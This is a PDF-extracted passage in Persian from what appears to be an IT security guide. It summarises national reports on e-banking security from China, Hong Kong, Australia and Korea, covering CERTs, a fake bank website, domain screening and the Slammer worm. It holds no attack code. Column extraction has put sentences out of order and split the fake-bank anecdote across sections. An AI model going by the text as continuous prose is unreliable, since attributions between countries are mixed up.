‫ﻧﻤﻮﻧﻪ‪ ،‬ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩ ﻫﺎ ﺗﻮﺳﻂ ﻣﺄﻣﻮﺭﺍﻥ ﺑـﺎﻧﻜﻲ ﺑـﺮﺍﻱ ﺍﻳﻤﻨـﻲ‬
‫ﺑﺎﻧﻚ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﻇﺮﻓﻴﺘﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ‬
‫ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﻳﻚ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺍﻭﻛـﺮﺍﻳﻦ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭘﺎﺳﺦ‬
‫‪ APEC‬ﺑﻪ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ ﺧﻮﺍﻫـﺪ ﭘﺮﺩﺍﺧـﺖ ﻭ ﺑﻄـﻮﺭ‬
‫ﺧﻼﺻﻪ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ ‪ Wi-Fi‬ﻫﻢ ﻣﻲﭘﺮﺩﺍﺯﺩ‪.‬‬
‫ﺳﻮﻡ‪ ،‬ﺗﺎ ﺁﺧﺮ ﺍﻛﺘﺒﺮ ‪ ۲۰۰۳‬ﺩﺭ ﺗﻤـﺎﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ‪APEC‬‬
‫ﻣﺮﺍﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﺸﻜﻴﻞ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﭼﻴﻦ‪ ،‬ﭘﻜﻦ‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﺟﻬﺖ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺍﻃﻼﻋﺎﺕ‪ BASEL2 ،‬ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻭ‬
‫ﭘﻴﺎﺩﻩ ﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺁﻧﻬﺎ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛـﻪ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺭﻭﺯﺍﻓﺰﻭﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ ﺗﺸﺨﻴـﺼﻬﺎﻱ‬
‫ﻣﺜﺒﺖ ﻧﺎﺻﺤﻴﺢ )‪ (false positive‬ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗﻨﻈـﻴﻢﻧـﺸﺪﻩ‬
‫ﭼﻨﺪﺍﻥ ﺁﺳﺎﻥ ﻧﻴﺴﺖ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﭘﻴﺸﻴﻦ ﺳﺎﺧﺘﻪ ﻣـﻲ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﺍﻳـﻦ ﺑـﻪ ﭘﻴﭽﻴـﺪﮔﻲ ﻭ ﻭﺍﺑـﺴﺘﮕﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺩﺍﻣﻦ ﻣﻲ ﺯﻧﺪ‪ .‬ﺩﺭ ﻫﻤﻴﻨﺤﺎﻝ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻧﺤﻮﺓ ﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻧﻴﺰ ﺑﻪ ﺧﻮﺑﻲ ﻣـﺴﺘﻨﺪ ﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ‪.‬‬
‫ﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕ ﹺ‬
‫ﻻ ﻣـﺴﺘﻨﺪﺍﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ‪ ،‬ﺑـﺴﻴﺎﺭ‬
‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ‪ .‬ﻧﻤﺎﻳﻨﺪﺓ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺩﺭ‬
‫ﺍﻳﻦ ﻛﺸﻮﺭ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﺗﺨﺼﺼﻲ ﺑﺮﺍﻱ ‪ download‬ﻛﺮﺩﻥ ﻓﺮﺍﻫﻢ ﺍﺳﺖ‪.‬‬
‫ﻋﻠﻴﺮﻏﻢ ﺍﻭﺿﺎﻉ ﻧﺎﻣﺴﺎﻋﺪ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﭼـﻴﻦ‬
‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷـﺪ ﻫـﺴﺘﻨﺪ‪ .‬ﺗﻌـﺪﺍﺩ ﺍﻳـﻦ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺧـﻼﻝ‬
‫ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۹۹‬ﺗﺎ ‪ ۲۰۰۳‬ﺍﺯ ﻳﻚ ﺑﻪ ﺑﻴﺴﺖ ﻭ ﻫﻔﺖ ﺭﺳﻴﺪﻩ ﻭ ﻧﻴﺰ‬
‫ﺣﺠﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﻴﺶ ﺍﺯ ‪ ۱۰۰‬ﺑﺮﺍﺑﺮ ﺭﺷﺪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻪ‬
‫ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﺩﺭ ﺯﻣـﺎﻥ ﺷـﻴﻮﻉ ﺑﻴﻤـﺎﺭﻱ ﺳـﺎﺭﺱ‪،‬‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭﻧﻖ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﻧﻬﺎﻳﺘـﹰﺎ ﻛـﺸﻮﺭ ﭼـﻴﻦ‬
‫ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ‪:‬‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﺳﻪ ﻧﻜﺘﻪ ﺍﺳﺎﺳﻲ ﺭﺍ ﻣﻄﺮﺡ ﻛﺮﺩ‪.‬‬
‫ﺍﻭﻝ‪ ،‬ﺗــﺎ ﺍﻛﺘﺒــﺮ ‪ ۲۰۰۳‬ﺩﺭ ﺗﻤــﺎﻣﻲ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ‪APEC‬‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻗﻮﺍﻧﻴﻨﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻛﻪ ﻣﻮﺍﺭﺩﻱ‬
‫ﭼﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻤـﺎﻝ ﻗـﻮﺍﻧﻴﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﺁﻣــﻮﺯﺵ ﻭ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﺟــﺮﺍﻱ ﻗــﺎﻧﻮﻥ ﺩﺭ ﻫﻤــﺔ‬
‫ﺳﻄﻮﺡ ﻻﺯﻡ ﺍﺳﺖ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺑـﺼﻮﺭﺕ‬
‫ﺧﻼﺻﻪ ﺩﺭ ﺍﻳﻦ ﺩﻭﺭﻩﻫﺎ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﻮﺡ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺍﻓﺰﺍﻳﺶ ﺷﻔﺎﻓﻴﺖ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﭼﻴﻦ‪ ،‬ﻫﻨﮓﻛﻨﮓ‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ‪ ،‬ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ‪ ،‬ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻭ ﻛﺮﻣﻬﺎ‬
‫ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﺤﻮﺓ ﺭﻓﺘـﺎﺭ ﻣﻬـﺎﺟﻤﻴﻦ‬
‫ﻫﻢ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻛـﺸﻮﺭ ﺑﺠـﺎﻱ ﻫـﺪﻑ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻦ ﻣﺴﺘﻘﻴﻢ ﺑﺎﻧﻜﻬﺎ‪ ،‬ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘـﻪ ‪ -‬ﻳﻌﻨـﻲ ﻣـﺸﺘﺮﻱ ‪-‬‬
‫ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺁﻣـﻮﺯﺵ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ‬
‫ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺑﺎﻧﻚ ﺟﻌﻠﻲ‬
‫ﺭﻭﻱ ﺩﺍﺩ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺁﺷـﻜﺎﺭﺗﺮ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ ﺑﺎﻧـﻚ ﺩﺭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ‪ ،‬ﻳﻚ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﻧﺎﻗﺺ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺍﺯ ﮔﻮﺍﻫﻲ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ‪ ،‬ﺑﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻌﺮﺽ ﻧـﺎﺑﻮﺩﻱ ﺳـﺮﻳﻊ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ‬
‫ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺩﻧﻴﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﭘﻴﮕﺮﺩﻫـﺎﻱ‬
‫ﻗــﺎﻧﻮﻧﻲ ﺑــﺼﻮﺭﺕ ﺩﻳﺠﻴﺘــﺎﻝ ﺍﺳــﺖ‪ ،‬ﺍﻣــﺎ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺭﻭﺵ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻛﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺑﺎﺷﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﭼﻴﻦ ﺑﻴـﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭﺧـﺼﻮﺹ‬
‫ﺟﺎﻳﮕﺎﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻳﻦ‬
‫ﻣﻘﺼﻮﺩ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺧﺎﺭﺟﻲ ﺑﻴﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﺍﺳـﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﻋﻤﺪﺓ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﭼﻴﻦ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺎ ﺁﻥ‬
‫ﻣﻮﺍﺟﻪ ﻣﻲﺑﺎﺷﺪ ﻓﻘﺪﺍﻥ ﺁﮔﺎﻫﻲ ﻭ ﺗﻮﺍﻧﺎﻳﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻣﺨﺎﻃﺮﺍﺕ )ﺑﺨﺼﻮﺹ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﺎﻫﻴﺖ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻳﻬﺎ( ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻣﺸﻜﻞ ﺩﺭ ﻛﺸﻮﺭ ﭼﻴﻦ ﺑﺪﻟﻴﻞ ﻫﻤﻜـﺎﺭﻱ ﺿـﻌﻴﻒ ﻣﻴـﺎﻥ ﻣﺮﺍﻛـﺰ‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﻣﺮﺍﻛﺰ ﻧﻈﺎﺭﺗﻲ ﺗﺸﺪﻳﺪ ﻫﻢ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪٢٢٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻝ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ ﻛﺮﺩ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺩﻋـﺎ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﺩﻓﺎﺗﺮﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻭ ﻧﻘﺎﻁ ﺩﻳﮕﺮ ﺩﺍﺭﺩ؛ ﺍﻣﺎ ﺩﺭ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻣﻌﻠـﻮﻡ‬
‫ﺷﺪ ﻛﻪ ﻫﻢ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ )ﻛـﻪ ﺩﺭ ﭼـﻴﻦ ﻣﻴﺰﺑـﺎﻧﻲ ﻣـﻲﺷـﺪ( ﻭ ﻫـﻢ‬
‫ﺑﺎﻧﻚ ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺟﻌﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﺑﺎﺭ ﺩﻳﮕﺮ ﻧﻴﺎﺯ ﺣﻴـﺎﺗﻲ‬
‫ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛـﺮﺩ‪ ،‬ﺑﺨـﺼﻮﺹ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺩﻟﻴﻞ ﻛﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‪ ،‬ﺧﻮﺩ ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻋﻤـﻞ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻛﺸﻮﺭ ﻫﻨﮓﻛﻨﮓ ﺩﺭﺣﺎﻝ ﺗﻬﻴﺔ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺑﺴﺘﺮﻫﺎﻱ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺁﻣـﻮﺯﺵ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺳـﺖ‪ ،‬ﻣﺜـﻞ ﺍﻧﺘـﺸﺎﺭ‬
‫ﺭﺍﻫﻨﻤﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﺑﻌـﺎﺩ ﺣﻴـﺎﺗﻲ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻼﻥ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟـﺮﺍﺋﻢ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪ .‬ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﺮ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻳـﻦ‬
‫ﻛﺸﻮﺭ ﺑﺎ ﺛﺒﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺍﻣﻨﻪ‪ ٢٤٠‬ﺭﺍﺑﻄـﺔ ﻧﺰﺩﻳﻜـﻲ ﺩﺍﺭﺩ ﻭ ﺑـﺮﺍﻱ‬
‫ﻛﻨﺘﺮﻝ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﺔ ﻣﺤﻠﻲ )‪ (.hk‬ﺍﺯ ﻓﺮﺁﻳﻨﺪﻱ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﺪ‪ :‬ﺍﮔﺮ ﻭﺍﮊﺓ "ﺑﺎﻧﻚ" ﻳﺎ ﻫﺮ ﺷﻜﻞ ﺩﻳﮕـﺮ ﺁﻥ ﺩﺭ ﻧـﺎﻡ ﺩﺍﻣﻨـﻪ‬
‫ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻮﺿﻮﻉ ﺑﻼﻓﺎﺻـﻠﻪ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻲ ﺑـﻪ ﻣﺮﺍﺟـﻊ‬
‫ﺫﻳﺼﻼﺡ ﺍﺭﺟﺎﻉ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻧﻴﺮﻭﻫﺎﻱ ﭘﻠﻴﺲ‪ ،‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﻫﻨـﮓﻛﻨـﮓ ﻫـﻢ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬
‫ﻗﺎﺑﻠﻴﺖ ﻭﺍﻛﻨﺶ ﺳﺮﻳﻊ ﺑﻪ ﺭﺧـﺪﺍﺩﻫﺎ‪ ،‬ﺑـﺎ ﻧﻬﺎﺩﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺩﺭ‬
‫ﺳــﻄﻮﺡ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﻫﻤﻜــﺎﺭﻱ ﺩﺍﺭﻧــﺪ‪ .‬ﺳﻴــﺴﺘﻢ ﻧﻈــﺎﺭﺕ ﺑــﺮ‬
‫ﺧﻮﺩﺍﺭﺯﻳﺎﺑﻲ )‪ ٢٤١(CSA‬ﺩﺭ ﭼﻴﺰﻱ ﺣﺪﻭﺩ ‪ ۷۰‬ﺗﺎ ‪ ۸۰‬ﺑﺎﻧـﻚ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ ﻭ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺍﺭﺯﻳﺎﺑﻲ ﺳﺎﻻﻧﻪ‪ ،‬ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻴـﺰ‬
‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺟﻤﻬﻮﺭﻱ ﻛﺮﻩ‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﻛﺮﻩ ﻧﺘﻮﺍﻧﺴﺖ ﺩﺭ ﺍﻳﻦ ﺑﺤﺚ ﺟﻬﺎﻧﻲ ﺷﺮﻛﺖ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑـﻪ‬
‫ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭘﺎﺳﺦ ﺩﺍﺩ‪ .‬ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ‬
‫ﻛﺮﺩﻧﺪ ﻛﻪ ﺍﮔﺮﭼﻪ ﻛﺮﻩ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﭘﻴـﺸﺮﻓﺘﻪﺍﻱ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺁﻧﻬﺎ ﻫﻨﻮﺯ ﺟﺎ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﻛـﺮﻩ‬
‫‪ %۶۵‬ﻣﻌﺎﻣﻼﺕ ﺑﻮﺭﺱ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ ﻭ ﺣﺪﻭﺩ‬
‫‪ ۲۵‬ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺧﻴـﺮ‬
‫ﻣﺜﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﻛـﺮﻡ ‪ Slammer‬ﺩﺭ ﮊﺍﻧﻮﻳـﺔ ‪ ۲۰۰۳‬ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﺷﺪﻳﺪﻱ ﺩﺭ ﻛﺮﻩ ﺩﺍﺷﺖ ﻭ ﻃﺒﻴﻌﺖ ﺷﻜﻨﻨﺪﺓ ﺷـﺒﻜﻪﻫـﺎ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﻛﺮﺩ‪.‬‬
‫‪240 Domain Registrar‬‬
‫‪241 Supervisory Control Self-Assessment‬‬
‫ﻛﺮﻩ ﺁﻣﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻛﺮﺩ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﺍﻓـﺮﺍﺩ ﺩﺭ‬
‫ﺧﺼﻮﺹ ﺍﻳﻤﻨـﻲ ﺳﻴـﺴﺘﻢ ﺑـﻮﺩ‪ .‬ﺑـﻪ ﮔﻔﺘـﺔ ﻭﺯﺍﺭﺕ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺗﻨﻬﺎ ‪ %۱۲،۹‬ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪%۱۶،۷ ،‬‬
‫ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﻭ ‪ %۹،۲‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕـﺮ ﺩﺍﺭﺍﻱ ﺑﺨـﺸﻲ‬
‫ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻫـﺴﺘﻨﺪ‪ .‬ﻛـﺮﻩ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻫﺰﻳﻨﺔ ﻣﺒﻬﻢ‬
